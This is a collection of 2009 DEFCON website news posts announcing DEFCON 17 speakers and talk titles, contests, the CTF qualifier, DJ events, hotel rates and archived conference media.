https://www.defcon.org/defconrss.xml Dark Tangent has been busy this past weekend, re-encoding the Audio from DEFCON 1 through 6 into iPod friendly m4b format! While he was at it, he decided to also re-encode the Hacker Documentaries in the archives to m4v format for your viewing pleasure! The audio from 1-6 can also be downloaded straight from iTunes! Also check out media.defcon.org for peer-to-peer links and links to all of the past media we're working on! DEFCON 1 Audio Links | DEFCON 1 Audio RSS DEFCON 2 Audio Links | DEFCON 2 Audio RSS DEFCON 3 Audio Links | DEFCON 3 Audio RSS DEFCON 4 Audio Links | DEFCON 4 Audio RSS DEFCON 5 Audio Links | DEFCON 5 Audio RSS DEFCON 6 Audio Links | DEFCON 6 Audio RSS Re-encoded Hacker Documentaries Hacker Documentary - 1994 - Unauthorized Access by Annaliza Savage Hacker Documentary - 1995 - Hackers 95 by Phon-E and R.F. Burns Hacker Documentary - 1997 - Hacks by Christine Bader Hacker Documentary - 2000 - Commodore 64 Cracks by Iron Feather

==> DJ Event Videos from DEFCON 17!

https://www.defcon.org/defconrss.xml For your visual and auditory pleasure, check out the following videos of the fantastic sets recorded from some of the DJ Events at DEFCON 17! Special thanks to Liquid8or for recording and providing these videos! Download and enjoy! Corrupt Data DJ Njntrubl - End of BW Ball DJ Felix 1 - Pool Party DJ Felix 2 - Pool Party DJ Felix Mix DJ Great Scott 1 - BW Ball DJ Great Scott 2 - BW Ball DJ Great Scott 3 - BW Ball DJ Great Scott 4 - BW Ball DJ Great Scott and Sailor Gloom - BW Ball DJ Jackalope - BW Ball DJ Jackalope - End of BW Ball DJ Kricz Klink - BW Ball DJ Pepse - Pool Party DJ Pepse and Felix - Pool Party DJ Reeves - NSB DJ Sailorgloom and Kricz Klink - BW Ball DJ Simo Sleevin - NSB DJ Simo Sleevin and Scritch - NSB DJ Undecided 1 - BW Ball DJ Undecided 2 - BW Ball DJ Undecided 1 - NSB DJ Undecided 2 - NSB DJ Undecided and Jackalope - BW Ball Video from NSB 1 Kricz Klink and Njntrubl - BW Ball DJ Jackalope Mix Clip

==> DEFCON 17 Early Release Videos!

https://www.defcon.org/defconrss.xml Check out some of the hot presentations from DEFCON 17! We'll be releasing all of the videos for free a few months out, but for now we've chosen a few we think you might enjoy! If you'd like to purchase the entire DVD collection of the DEFCON 17 presentations, you can do so at The Source of Knowledge website. Failure Adam Savage Video | Audio "Smart" Parking Meter Implementations, Globalism, and You Joe Grand, Jake Appelbaum, and Chris Tarnovsky Video and Slides | Slides | Audio More Tricks for Defeating SSL Moxie Marlinspike Video and Slides | Slides | Audio The Day of the Updates Itzik Kotler and Tomer Bitton Slides | Audio Advancing Video Application Attacks with Video Interception, Recording, and Replay Jason Ostrom and Arjun Sambamoorthy Slides | Audio

==> DEFCON 17 CTF Packet Captures & Binaries Available!

https://www.defcon.org/defconrss.xml The DEFCON 17 CTF packet captures and binaries are now available via bittorrent. Enjoy!

==> DEFCON 17 Press Page Updated!

https://www.defcon.org/defconrss.xml Head on over to the DEFCON Press Page and check out the news from this year's show! You can also find the press listed on the DEFCON 17 Archives Page! If you've come across a good article on DEFCON 17 that you think should be up there, don't hesitate to send it to neil {at} defcon }dot{ org for posting!

==> DEFCON 17 Archives Page is Live!

https://www.defcon.org/defconrss.xml You can now peruse the DEFCON 17 Archives Page, which contains links to all of the presentation materials and code available, including all updated materials we have received! We'll have the printed program and press links up soon, and down the road you will be able to download all of the audio and video of the talks for free! We're working on getting a few early release videos up next week to tide you over!

==> Upload all of your DEFCON 17 Photos to pics.defcon.org!

https://www.defcon.org/defconrss.xml Help to preserve and share those DEFCON 17 memories on pics.defcon.org! If you have a DEFCON Forums account, you already have a pics account, just use the same login information. While you're at it, submit your galleries to defconpics.org as well!

==> Follow the Post-Con discussion on the DEFCON Forums

https://www.defcon.org/defconrss.xml Get over to the DEFCON Forums to join in on the post-con buzz from DEFCON 17! You can find out what people thought, content links, and it's never too early to weigh in on next year's show. Remember, DEFCON is your con, and the best way to get involved is to get in on the discussions posted at forum.defcon.org. Have an idea for a new contest or event? It's the best place to start!

==> Autographed, White "I Hack Charities" Shirts Listed on Ebay

https://www.defcon.org/defconrss.xml Up for Auction: THREE "I hack charities" White Signed T-ShirtS. All of the proceeds from these auctions except the ebay auction cost will be donated to "Hackers for charities" http://johnny.ihackstuff.com/ These Shirts were Signed by Most of the Big names at Defcon 17. Anyone that Attended may have seen these shirts displayed at the "Hackers for Charities" booth on sunday. Everyone online and at defcon has seen the Black "I hack charities" T-shirts. But not many have seen the white ones. Well that is because there were only 4 white shirts printed!! Johnny Long has 1 and the other 3 were all signed by the people below for these auctions. Each shirt is unique with the location of the signatures and the quotes written by the signers. These shirts were signed by: Johnny Long Dan Kaminsky Jeff "The Dark Tangent" Moss Kevin Mitnick Joe "$Kingpin$" Grand Bruce Potter Nikita Priest The Entire 2009 CTF winning team and many others. Listing URLs: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120458285523 http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120458285993 http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120458286499

==> DEFCON 17 Receipt Posted, Aaaand We're Spent...

https://www.defcon.org/defconrss.xml Well, we've made it back to our respective homes, with another awesome DEFCON on the books! We are now in recovery mode, and normal updating will resume next week! The DEFCON 17 Receipt of Admission is now posted! Thanks to all for making this a fantastic DEFCON!

==> Don't miss NIST's Hack the Quantum at DEFCON 17!

https://www.defcon.org/defconrss.xml Hack the Quantum. Presented by the Joint Quantum Institute, National Institute of Standards and Technology and University of Maryland, and the Centre for Quantum Technologies, National University of Singapore. With a hands-on Bell-o-meter for entangled photons you can convince yourself that there are quantum effects beyond classical physics: a real qubit is offered to the participant who achieves the strongest violation of a Bell inequality. We also present a fresh attack that breaks many current quantum crypto systems, and demonstrate a photon-based quantum random number generator. Find it in Capri 114/115 Friday-Sunday at DEFCON 17!

==> The Community Delivers Great Mobile Options for DEFCON 17!

https://www.defcon.org/defconrss.xml There has been an outpouring of mobile ready and mobile friendly options from the DEFCON community this year to make your DEFCON scheduling easier! First there is a full blown (and very cool) unofficial iPhone app that has been submitted to the Apple store for review, made by Johnnie "Jedi" Pittmann (@dtjedi) and Todd Kimball (@tkimball). As of this posting, this app is not yet available from the Apple store. They have opted, pending acceptance from Apple, to make the app available via ad-hoc distribution, and will be accepting requests by email until Wednesday, July 29th at 9am PDT. The method, contact info, and possible risks are clearly outlined at http://www.group6.net/AdHoc.html From their site on http://www.group6.net/Defcon_App.html: After years of misplaced, begged, borrowed, stolen Defcon schedules, we decided to do something to help. Introducing the Defcon 17 iPhone app. Get all the up to date details on the con on your iPhone/iPod Touch. In addition to that, you can view the official Defcon RSS feed and #defcon Twitter posts. Talk and event calendars, speaker and dj bios, and a map of the venue. Features - Talk Calendar - Event Calendar - Speaker/DJ Biographies - Defcon RSS Feed Reader - Twitter #defcon Not to mention the great efforts of Darth Null to bring you an extremely useful web-based iPhone/mobile ready schedule and map application! You can find his fantastic work at http://www.darthnull.org. There are also a couple of Google calendars out there, one for events, thanks to JonM, and a full schedule at http://defcon.starthan.net/ All of these folks are coordinating together for updates, to bring you the freshest info from DEFCON 17! A huge thank you to all of them for contributing!

==> Keep Up On What's Happening At DEFCON 17!

https://www.defcon.org/defconrss.xml You can go to the DEFCON Qik Feed or our Qik group and check out what we and group members are doing at con! Use the #defcon hashtag on Twitter to search for and make defcon related tweets easier to find!

==> Metasploit Track at DEFCON 17!

https://www.defcon.org/defconrss.xml Check out all the Metasploit goodness you can absorb in the Metasploit Track at DEFCON 17! It all takes place Saturday in Track 2! 10:00 - 10:50 Breaking the "Unbreakable" Oracle with Metasploit Chris Gates & MC 11:00 - 11:50 Using Guided Missiles in Drive-Bys: Automatic browser fingerprinting and exploitation with Metasploit egypt 12:00 - 12:20 WMAP: Metasploit goes Web Efrain Torres 14:00 - 15:20 MetaPhish Val Smith, Colin Ames, David Kerb 15:30 - 16:00 MSF Telephony I)ruid 16:10 - 16:40 Metasploit Evolved, Meterpreter Advances, Hacking the Next Internet HD Moore 16:50 - 17:20 MSF Wifi Mike Kershaw 17:30 - 18:00 App Assessment the Metasploit Way David Maynor 18:10 - 18:40 Macsploitation with Metasploit Dino Dai Zovi 18:50 - 19:20 Metasploit Autopsy: Recontructing the Crime Scene Peter Silberman & Steve Davis

==> Badge Hacking Buzz!

https://www.defcon.org/defconrss.xml Check out the Badge Hacking Contest threads on the DEFCON Forums to see what everyone is talking about bringing/using to Hack the badge this year. It might give you some inspiration!

==> The Summit at DEFCON 17

https://www.defcon.org/defconrss.xml Don't forget to attend The SUMMIT Fund Raiser for the EFF (www.eff.org), 50+ Speakers attending, 3 Djs, VIP event, Monaco Tower (TOP FLOOR), Top of the RIV , 8:30pm Thursday Night. See Forum for more info. Add to your social calendar. $30/$15 Student.

==> DEFCON 17 Badge Pre-release Info!

https://www.defcon.org/defconrss.xml Joe Grand has posted some pre-release info on the DEFCON Forums to get you started for the badge hacking contest this year. Go check it out at: https://forum.defcon.org/showthread.php?t=10655

==> DEFCON 17 Events/Contests Posted on Schedule Page!

https://www.defcon.org/defconrss.xml The specific info for events and contests has been posted in the DEFCON 17 Schedule Page! If you have an event or contest that is not posted please send hours of operation and location to neil at defcon.org, and we'll get them up!

==> DEFCON 17 Google Calendar

https://www.defcon.org/defconrss.xml JonM has been so kind as to begin to start populating a Google calendar of the events for DEFCON 17! More events will be added as the times and locations come in!

==> DEFCON 17 CTF Quals Cartoon Write Up

https://www.defcon.org/defconrss.xml Check out this awesome write-up of the CTF Quals from one of the qualifying teams, the Sapheads! Clever and educational, it provides a great perspective on the thought processes behind solving the B300 section of the qualification round. Sounds like they plan to do more, so we'll keep an eye out! http://hackerschool.org/DefconCTF/17/B300.html

==> Hacker Jeopardy is Looking for Team Sign Ups

https://www.defcon.org/defconrss.xml From G Mark on the DEFCON Forums: THE PROPER (AND ONLY) WAY TO SIGN UP A TEAM FOR HACKER JEOPARDY Okay, just to make sure that everyone has an equal opportunity, here are the directions to sign up your team. Don't do something else (like post a reply to Winn's thread, since it might not get read in time -- we had this problem last year.) 1. Open an e-mail to "hackerjeopardy@gmail.com" 2. Include your TEAM NAME and the real names and handles of your three (3) team players. (Privacy policy: we protect your identity unless a Fed or someone with a whole bunch of cash wants it.) 3. Explain why you are 31337 enough to play this year. Brag like you're trying to get lucky. 4. Include at least one cellphone number so we can contact you to notify if you're playing or there's a problem with your entry. 5. Send the e-mail as soon as possible, but absolutely no later than 90 minutes before the scheduled start of the round to be played. In case of any dispute, you're wrong (unless you are an entity described in #2 above.)

==> Alternate slots for ninjas... LosT @ Con Mystery Challenge

https://www.defcon.org/defconrss.xml There are still alternate slots open for teams considering trying to register. There *may* be a way for alternate teams to knock teams from their spots on day one of the contest this year. Check out the official Mystery Challenge site at http://ten-five-seven.org

==> CannonBall Run is Back!

https://www.defcon.org/defconrss.xml The 5th Annual CannonBall Run is set to start Thursday July 30th 2009 with the first car leaving at 11:00 AM. We will start in Redondo Beach and arrive yet again at the Riviera Hotel in Las Vegas, Nevada. website: http://moloch.org/cannonball/ DEFCON Forum: https://forum.defcon.org/forumdisplay.php?f=474 twitter: http://twitter.com/dccannonballrun qik: http://qik.com/tommee

==> Team Fortress 2 Tournament - Only Two Days Left to Sign Up for Quals!

https://www.defcon.org/defconrss.xml Qualifiers - July 17-18 Get your teams together and mark your calendar. Qualifiers will be the evenings of July 17-18. As teams sign up, we'll work with the team captains to finalize scheduling. Also, we'll group the individual reg's together into teams for the quals as well. If you haven't signed up, please do so sooner rather than later. NOTE you don't need a full team to sign up a team. If you've got 4 or 5 friends you want to play with, register a team and we'll fill the blanks up with individual reg's later. Sign up at: http://www.nomoose.org/dctf2/

==> Coffee Wars Call for Beans

https://www.defcon.org/defconrss.xml http://www.coffeewars.org/CallForBeans.shtml From shrdlu on the DEFCON Forums: Information for those hoping to win on our momentous Tenth Year of celebrating caffeine. You can submit your beans before Friday morning, by various arcane methods, none of which will be posted here (but email to Foofus might help). You *MUST* submit them before 10AM (or close to it), since that's when we start brewing and drinking and judging. We'll send the occasional messenger out into the massed and frightening horde if you are trying to bring it Friday morning. Coffee Wars only takes place on Friday morning. We're usually done by 11-ish, and vanished completely by Noon. You can spot most of the judges the rest of the day due to the slight vibration of their entire body (except me; I *like* that much caffeine).

==> DEFCON 17 Artwork Contest Winners!

https://www.defcon.org/defconrss.xml Congratulations to the winners of the DEFCON 17 Artwork Contest! People's Choice: "Watchmen Parody" by Mar T-shirt Category: "Floppy" by JesseK Poster Category: "DEFCON 17" by Steve Andrus Bumper Sticker Category: "Tailing The Elite Hacker" by downtownDB Honorable Mention goes out to "DT Has a Posse" by Mar! Thank you to all of the entrants for their great work!

==> DEFCON 17 Speaking Schedule is Live and Final Speakers are Posted!

https://www.defcon.org/defconrss.xml That's right! The DEFCON 17 Schedule is now live! It may experience a few minor changes before all is said and done, but it is pretty much good to go! Events will be posted on the schedule page as exact times roll in, so keep your eyes peeled for updates! If you are a speaker and see any discrepancies, pass them along to talks at defcon dot org. Go have a look, and while you're at it, check out the last batch of awesome speakers we have lined up for you this year: Preparing for Cyber War: Strategy and Force Posture in the Information-Centric World Dmitri Alperovitch, Marcus Sachs, Phyllis Schneck and Ed Skoudis Hello, My Name is /hostname/ Endgrain, Dan Kaminsky and Tiffany Rad Dradis Framework - Sharing Information will get you Root etd 0-day, gh0stnet and the Inside Story of the Adobe JBIG2 Vulnerability Matt Richard and Steven Adair Three Point Oh. Johnny Long Reverse Engineering By Crayon: Game Changing Hypervisor Based Malware Analysis and Visualization Danny Quist and Lorie M. Liebrock Cracking 400,000 Passwords, or How to Explain to Your Roommate why the Power Bill is a Little High Matt Weir and Sudhir Aggarwal Catching DNS Tunnels with AI Jhind Perspective of the DoD Chief Security Officer Robert Lentz

==> Big Speaker Update on defcon.org! Adam Savage to speak at DEFCON 17!

https://www.defcon.org/defconrss.xml Check out the big old list of hotness on https://www.defcon.org, we have just added 39 more speakers to the site! There are only a few speakers yet to post, and the schedule is being webbified into a more mobile-friendly format (than past years) as we speak, so expect more updates in the next couple of days! You may have already heard on Twitter, it is our pleasure to officially announce that Adam Savage of MythBusters fame will be speaking this year at DEFCON! So get on over to defcon.org and check it all out, and remember to follow us on Twitter for updates as they occur!

==> Voting is Open for the DEFCON 17 Artwork Contest!

https://www.defcon.org/defconrss.xml Here's what you do: go to the DEFCON 17 Artwork Contest Gallery on pics.defcon.org and pick your favorite. Then head on over here and vote in the poll! The default display for the gallery is 12 items per page, so make sure you check out all 3 pages. There are 29 entries total. Good Luck to all the fantastic entries!

==> DEFCON 17 DJ pages are live!

https://www.defcon.org/defconrss.xml Check out the new DJ pages on the DEFCON 17 site! You can find line-ups for the Black & White bleep, Pool Parties, and daytime Chillout area! There are also artist bios and samples of the music you might encounter! It's all at https://www.defcon.org/html/defcon-17/dc-17-djs.html! And don't forget to follow the DEFCON Twitter feed for news as it happens, leading up to and during DEFCON 17!

==> Thursday Talks Line-up at DEFCON 17

https://www.defcon.org/defconrss.xml This year, we're packing even more goodness into Thursday's activities, with a half day of talks aimed at the DEFCON n00b. These talks will cover everything from basic hacking skills to what our beloved con is about, and how to get the most out of it. If you are new to DEFCON, or feel like you could get more out of it, this "basic training" will be an invaluable resource! DEFCON 101 HighWiz, The Dark Tangent, Russr, DJ Jackalope, Deviant Ollam, Thorn, ThePrez98, LosT, Siviak Pre-Con Introduction to Lock Picking Alek Amrani DEFCON 1 - A Personal Account Dead Addict Con Kung-Fu: Defending Yourself @ DEFCON Rob "Padre" DeGulielmo Hardware Black Magic - Building devices with FPGAs Dr. Fouad Kiamilev DCFluX in: The Man with the Soldering Gun Matt Krick "DCFluX" Effective Information Security Career Planning Lee Kushner and Mike Murray DC Network Session Lockheed So You Got Arrested in Vegas... Jim Rennie Hacking with GNURadio Videoman

==> Mystery Challenge Registration Update

https://www.defcon.org/defconrss.xml
Mystery Challenge Registration Update Congratulations to the following teams: 1. Team Silverlock 2. Team Psychoholics 3. Team Kuro 4. MobileDisco 5. Team Render 6. Team Security Catalyst 7. Team Lords of Failure 8. DEADC0DE 9. Team America (@#$& YEAH!) There are still a few slots available. Are YOU up to the challenge? 1o57

==> Even More DEFCON 17 Speaker Updates!

https://www.defcon.org/defconrss.xml Yes folks, yet another batch of great talks has been posted on the speaker page! That should do it for this week, but stay tuned next week for the last batches of talks to go up! Panel - Ask EFF: The Year in Digital Civil Liberties Kurt Opsahl, Jennifer Granick, Kevin Bankston, Fred von Lohmann, Marcia Hofmann and Peter Eckersley Panel - Meet the Feds 2009 The Middler 2.0: It's Not Just for Web Apps Anymore Jay Beale and Justin Searle Beckstrom's Law - A Model for Valuing Networks and Security Rod Beckstrom Sharepoint 2007 Knowledge Network Exposed Digividual Socially Owned in the Cloud Digividual Personal Survival Preparedness Steve Dunker and Kristie Dunker Social Zombies: Your Friends Want to Eat Your Brains Tom Eston and Kevin Johnson Cracking the Poor and the Rich: Discovering the Relationship Between Physical and Network Security Damian Finol FOE -- Feeding Controversial News to Censored Countries (Without Using Proxy Servers) Sho bleep Hardware Black Magic - Building devices with FPGAs Dr. Fouad Kiamilev Hack The Textbook Jon R. Kibler and Mike Cooper Advanced SQL Injection Joseph McCray Weaponizing the Web: New Attacks on User-generated Content Shawn Moyer and Nathan Hamiel Automated Malware Similarity Analysis Daniel Raygoza The Security Risks of Web 2.0 David Rook Proxy Prank-o-Matic Charlie Vedaa and "Anonymous secondary speaker"

==> CTF Quals Are Over, But There are Other Bases to Belong

https://www.defcon.org/defconrss.xml The CTF Quals round has ended! DEFCON congratulates the qualifying teams! From ddtek.biz: Qualified teams: 1. sk3wlm4st3r (CONFIRMED! as sk3wl0fr00t) 2. Team Awesome (aka VedaGodz) (CONFIRMED!) 3. Sexy Pwndas (unconfirmed) 4. PLUS (unconfirmed) 5. Shellphish (CONFIRMED!) 6. Song of Freedom (CONFIRMED!) 7. lollerskaterz dropping from roflcopters (CONFIRMED!) 8. Underminers (unconfirmed) 9. Routards (CONFIRMED!) 10. WOWHACKER (CONFIRMED!) alt. Sapheads_ (CONFIRMED!) alt. sutegoma (CONFIRMED!) alt. CLiP (unconfirmed) alt. pebkac (unconfirmed) alt. ACMEPharm (unconfirmed) If you didn't make it and still want a mind bending challenge at DEFCON this year, there are a few slots left in LosT's Mystery Challenge, so wrangle up a team and get to ten-five-seven.org to find clues on how to enter! Open CTF will also be back this year, bigger and badder than ever if you need that attack/defend goodness!

==> DEFCON 17 Speaker Update

https://www.defcon.org/defconrss.xml Here are a few more talks to keep you going! We have a bunch more coming through the end of the week, so stay tuned. Follow the DEFCON Twitter Feed for announcements as they are posted! BitTorrent Hacks Michael Brooks and David Aslanian Unfair Use - Speculations on the Future of Piracy Dead Addict DEFCON 1 - A Personal Account Dead Addict Con Kung-Fu:Defending Yourself @ DEFCON Rob "Padre" DeGulielmo Router Exploitation FX Jackpotting Automated Teller Machines Barnaby Jack Something about Network Security Dan Kaminsky Malware Freak Show Nicholas J. Percoco and Jibran Ilyas That Awesome Time I Was Sued For Two Billion Dollars Jason Scott Good Vibrations: Hacking Motion Sickness on the Cheap Tottenkoph

==> DEFCON 17 News

https://www.defcon.org/defconrss.xml Keep your eyes on the DEFCON 17 site for a page coming soon that will give you the lowdown on all the great DJ's that will spin at DEFCON this year. We'll have pics and bios, as well as sample tracks for download! Also, due to the great number of awesome talks we're accepting in the 1200 second spotlight, we've decided to make a fifth track for turbo/breakout talks! So keep watching for more updates, and as always, You can follow the DEFCON Twitter feed for links to the info as it's posted!

==> DEFCON 17 CFP Update

https://www.defcon.org/defconrss.xml If you submitted a CFP and have not been notified of its status, hold tight! We have a lot of submissions this year that we want to accept. If you haven't heard back from us by now, you're still in consideration for a time slot. We're probably trying to find room for you. Sorry we missed our June 1st notification date, but we have too much awesome sauce for our burgers. An update will be posted to the website when we have finished our selection process; all CFP submitters will be sent an email of their status at that point. Thanks!

==> Thursday (July 30th) at DEFCON 17

https://www.defcon.org/defconrss.xml In the past, we have usually opened up registration and swag midday Thursday for those early birds that want to get a jump on things before the con officially starts. There are also a few unofficial events and gatherings, like the Toxic BBQ and theSummit, that make Thursday almost an extra day of DEFCON. This year, we're packing even more goodness into Thursday's activities, with a half day track of talks aimed at the DEFCON newb. These talks will cover everything from basic hacking skills to what our beloved con is about, and how to get the most out of it. If you are new to DEFCON, or feel like you could get more out of it, this "basic training" will be an invaluable resource! In addition, the Chill Out Area will be open for hanging out and the infamous DEFCON wireless network will be up and running, so you can pwn or be pwned right out of the gate! Stay tuned for a complete listing of all the great talks planned for Thursday, and as always, you can get instant updates as they occur by following the DEFCON Twitter feed!

==> DEFCON 17 Mystery Challenge Update

https://www.defcon.org/defconrss.xml LosT can neither confirm nor deny that registration is currently open for the LosT@Con Mystery Challenge. See Ten-Five-Seven.org for updates. Kuni welcomes you to the wheel of fish.

==> Updates and Reminders for DEFCON 17

https://www.defcon.org/defconrss.xml Riviera Rooms: Be sure to book your room for this year's DEFCON! The Riviera is offering a DEFCON 17 special room rate of $89/night for 1-2 guests, add $20/night for guests 3-4. Hurry, space is limited, and our block usually sells out early! New DJ Organizer: Welcome to DJ Great Scott, who has accepted the mantle of DJ organizer for DEFCON 17. He will be the overlord of the Black and White bleep and the Poolside DJ action! Get ahold of him on the Forums (greatscott) or at blackandwhitedjs@gmail.com if you want to spin! Capture the Flag: CTF Quals Registration ends 6/4/09! Get your teams together and get in there! Register at: http://ddtek.biz/ctf/register.html Artwork Contest: Only about 2 weeks left in the DEFCON 17 Artwork Contest! Make some hacker art and win fabulous prizes (like free entry to DEFCON 17 and swag!) Rules posted at: https://www.defcon.org/html/defcon-17/dc-17-artwork-contest.html Contest & Events: Check out the Contests and Events section of the forums to see what's new! TommEE Pickles has resurrected the CannonBall Run, there's a new game called the 10,000 Cent Hacker Pyramid, and Coffee Wars is having its 10th birthday! Extended hours at the pool mean Pool Party! As always, follow the DEFCON Twitter for all the announcements as they occur!

==> New DEFCON Tools Page is Live!

https://www.defcon.org/defconrss.xml Check out the DEFCON Tools page, a new section of the archives that collects the innovative tools released at DEFCON talks over the years! We currently have a list of the tools released at DEFCON 16, and are working backward to archive the tools from past shows. Special thanks to Mubix (aka Rob Fuller), of room362.com, for graciously collecting and writing up this content! All the tools Mubix could find are archived on the DEFCON media server. If you have access to a tool that is not locally stored, let us know at neil [at] defcon ]dot[ org and we'll get it up there!

==> More Talks for DEFCON 17!

https://www.defcon.org/defconrss.xml Here's another great round of talks to get you excited for DEFCON 17! DefCon 101 HighWiz, The Dark Tangent, Russr, DJ Jackalope, Deviant Ollam, Thorn, ThePrez98, Lost, Siviak Session Donation Alex Amrani Sniff Keystrokes With Lasers/Voltmeters - Side Channel Attacks Using Optical Sampling Of Mechanical Energy And Power Line Leakage Andrea Barisani and Daniele Bianco Hijacking Web 2.0 Sites with SSLstrip--Hands-on Training Sam Bowne Attacking SMS. It's No Longer Your BFF Brandon Dixon Breaking the "Unbreakable" Oracle with Metasploit Chris Gates and Mario Ceballos Injectable Exploits: Two New Tools for Pwning Web Apps and Browsers Kevin Johnson, Justin Searle and Frank DiMaggio eXercise in Messaging and Presence Pwnage Ava Latrope Defcon Security Jam 2: The Fails Keep on Coming David Mortman Hacking Sleep: How to Build Your Very Own Sleep Lab Ne0nRa1n and Keith Biddulph RFID MythBusting Chris Paget Search And Seizure Explained - They Took My Laptop! Tyler Pitchford, Esq. Fragging Game Servers Bruce Potter and Logan Lodge Hackerspaces: The Legal Bases RogueClown Debaze - A Remote Method Enumeration Tool for Flex Servers Jon Rose Bluetooth, Smells Like Chicken. Dominic Spill, Michael Ossmann and Mark Steward "I Am Walking Through a City Made of Glass and I Have a Bag Full of Rocks" (Dispelling the Myths and Discussing the Facts of Global Cyber-Warfare) Jayson Street Dangerous Minds: The Art of Guerrilla Data Mining Mark Ryan Del Moral Talabis Follow us on Twitter!

==> DEFCON 17 Speaker Update!

https://www.defcon.org/defconrss.xml The CFP is now closed and selection is in full swing! Check out the latest batch of talks selected for DEFCON 17!
- Unmasking You [Joshua D. Abraham and Robert Hansen]
- Confidence Game Theater [cough]
- Death of Anonymous Travel [Sherri Davidoff]
- Using Guided Missiles in Drive-Bys: Automatic browser fingerprinting and exploitation with Metasploit [Egypt]
- "Smart" Parking Meter Implementations, Globalism, and You (aka Meter Maids Eat Their Young) [Joe "Kingpin" Grand, Jake Appelbaum, and Chris Tarnovsky]
- The Psychology of Security Unusability [Peter Gutmann]
- Effective Information Security Career Planning [Lee Kushner and Mike Murray]
- Abusing Firefox Addons [Roberto Suggi Liverani and Nick Freeman]
- Clobbering the Cloud [Haroon Meer and Marco Slaviero]
- RAID Recovery: Recover your bleep by Sight and Sound [Scott Moulton]
- Protecting Against and Investigating Insider Threats (A methodical, multi-pronged approach to protecting your organization) [Antonio "Tony" Rucci]
- PLA Information Warfare Development Timeline and Nodal Analysis [Zulu Meet]
Be sure to follow the DEFCON Twitter Feed for speaker updates and other announcements as they occur!

==> Notice to DEFCON 17 CFP Submitters

https://www.defcon.org/defconrss.xml This is just a general reminder, we want to make sure all the submissions sent to us get a fair shot and are reviewed equally. We don't want any submissions missed so we send you an email to let you know it arrived safely. You should receive an acknowledgment of your submission within 48 hours after you have submitted. If you have not received an email from us, please resend your submission to talks at defcon dot org.

==> DEFCON 17 CFP Extended over Weekend!

https://www.defcon.org/defconrss.xml That's right slackers, you now have until Monday, May 18th to turn in your DEFCON CFP Submission! We want your insightful and interesting research to make it to the DEFCON 17 Stage! So get on it, what are you doing reading this? Go work on your submission! You can read the submission rules and get the CFP form at: https://www.defcon.org/html/defcon-17/dc-17-cfp.html

==> DEFCON 17 Talks Update

https://www.defcon.org/defconrss.xml Here are a few more of the talks chosen for DEFCON 17 to whet your appetite:
- Why Tor is Slow, and What We're Doing About It [Roger Dingledine]
- Managed Code Rootkits - Hooking into Runtime Environments [Erez Metula]
- Maximum CTF: Getting the Most Out of Capture the Flag [Psifertex]
- Hacking, Biohacking, and the Future of Humanity [Richard Thieme]
As always, we will be posting these talks as they are chosen, so keep your eyes on the speakers page! Better yet, follow the DEFCON Twitter Feed for up to the minute notification of new talks, and all of the announcements relating to DEFCON 17!

==> The Mystery Challenge Has a New Home! Team Registration Opening Soon!

https://www.defcon.org/defconrss.xml The much loved and anticipated LosT@Con Mystery Challenge has a new home on the web at https://ten-five-seven.org! LosT informs us that team registration for this year's challenge will be opening soon, so keep your eyes peeled on the new site, and on the Mystery Challenge Forum on the DEFCON Forums for all the details on how to enter and for clues relating to the challenge!

==> DEFCON 17 Artwork Contest is Open!

https://www.defcon.org/defconrss.xml It's that time again, art ninjas! Whip out your favorite medium and get to creating, because the official DEFCON 17 Artwork Contest is now underway, and will run now to June 15, 2009. The goal for this year's artwork contest is to create a piece of art you would see plastered on a wall, mailbox, telephone pole or bumper of a car of the nearest urban center. What we're looking for is an underground feel, reminiscent of DIY 'zines, gig posters, or pulp comics... (Read on)

==> More DEFCON 17 Talks Selected!

https://www.defcon.org/defconrss.xml Speaker selection is underway, here are a few of the chosen talks! Expect more early to mid next week!
- Win at Reversing: Tracing and Sandboxing through Inline Hooking [Nick Harbour]
- Computer and Internet Security Law - A Year in Review 2008 - 2009 [Robert Clark]
- Making Fun of Your Malware [Michael Ligh & Matthew Richard]
- De Gustibus, or Hacking your Tastebuds [Sandy Clark "Mouse"]
- Hacking UFOlogy 102: The Implications of UFOs for Life, the Universe, and Everything [Richard Thieme]
For all of the latest updates as they occur, be sure to follow us on Twitter at https://twitter.com/_defcon_

==> DEFCON 17 Site and First Round of Speakers are Live!

https://www.defcon.org/defconrss.xml The first round of speakers has been chosen, with another to follow soon! You can check them out on the DEFCON 17 site, which is now live and will contain all the info for this year's con!

==> The Riviera - Good Changes for DEFCON 17

https://www.defcon.org/defconrss.xml This year at the Riv we'll see some nice changes to some of the pricing and policies of the hotel. Some initial RIV updates from the Dark Tangent on the DEFCON Forums:
1 - Room prices have been dropped to $89/Day and should be reflected here soon: http://www.rivierahotel.com/resnet/roomres.asp?ID=309 If you booked under the old prices I _think_ the pricing will automagically be reflected in your bill as the new room block price.
2 - We will get the pool to 11pm for swimming and hanging out. We can do low key DJ action till then. We are currently talking with them to determine how we can keep it longer.
3 - Drink prices on beer and booze have been reduced. I'll update this post when I have accurate information.
We'll post more updates and details as they become available!

==> DEFCON 17 Booking Rate for the Riviera is Live

https://www.defcon.org/defconrss.xml Time to book those rooms for DEFCON 17. The Riviera has posted the booking info for this year's show. They are offering a rate of $102USD per night for 1-2 guests (add $20USD for additional guests up to 4). Note: The Nevada State Senate passed a law to increase room tax to 12% effective July 1, 2009. The tax increase will apply to all rooms occupied on and after July 1, 2009 regardless of when the reservation was made. You can acquire your room online at the following url: http://www.rivierahotel.com/resnet/roomres.asp?ID=309

==> DEFCON 17 CTF Qualifier announced despite Conficker

https://www.defcon.org/defconrss.xml FOR IMMEDIATE RELEASE 1 APRIL 2009
DEFCON CTF QUALIFIER ANNOUNCED
Defense Diutinus Technologies Corp (ddtek) is pleased to announce the round of qualification for DEFCON 17 CTF. The competition will be held on 5-7 June - without a stop, participants can be located everywhere. All are to play, but only the 9 best groups will be invited to join us in Las Vegas for the annual DEFCON ninja square off. We also intend to honour the code of the former CTF host and automatically qualify last years champion, the sk3wl of r00t (although we sincerely hope them to participate in qualifications). The qualification round will be in the style of game board, but answers need not be in the form of a question. Categories will require teams to demonstrate the superiority of hacking into a vast realm of security. You must be registered for participate.
Registration site: http://ddtek.biz/ctf/register.html
Registration opens: 01.04.2009 00:00:00 UTC
Registration ends: 04.06.2009 00:00:00 UTC
Qualifications open: 05.06.2009 23:00:00 UTC
Qualifications ends: 07.06.2009 23:00:00 UTC
